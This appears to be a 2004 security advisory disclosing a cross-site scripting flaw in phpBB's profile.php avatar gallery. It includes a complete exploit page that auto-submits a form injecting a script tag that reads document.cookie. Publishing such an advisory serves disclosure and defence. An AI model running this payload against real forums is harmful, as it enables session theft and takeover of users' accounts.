phpBB profile.php Cross Site Scripting Vulnerability

2004-03-24T00:00:00
ID SECURITYVULNS:DOC:5939
Type securityvulns
Reporter Securityvulns
Modified 2004-03-24T00:00:00

Description

Advisory Name : phpBB profile.php Cross Site Scripting Vulnerability Release Date : Mar 21,2004 Application : phpBB Version : phpBB 2.0.6d or others? Platform : PHP Vendor URL : http://www.phpbb.com/ Author : Cheng Peng Su(apple_soup_at_msn.com)

Proof of Conecpt:

 This vuln is in profile.php,when you click [Show Gallery],phpBB

will show you Avatar gallery,asking you to choose one for yourself. The hole is in the form,after submitting phpBB will use the value of "avatarselect" as the path of the gallery directly,without filtering any illegal characters.

Exploit:

-------------exploit.htm-------------- <form name='f' action="http://site/profile.php?mode=editprofile" method="post"> <input name="avatarselect" value='" ><script>alert(document.cookie)</script>'> <input type="submit" name="submitavatar" value="Select avatar"> </form> <script> window.onload=function() { document.all.submitavatar.click(); } </script> ---------------end-------------------

Contact:

Cheng Peng Su Class 1,Senior 2,High school attached to Wuhan University Wuhan,Hubei,China(430072) apple_soup_at_msn.com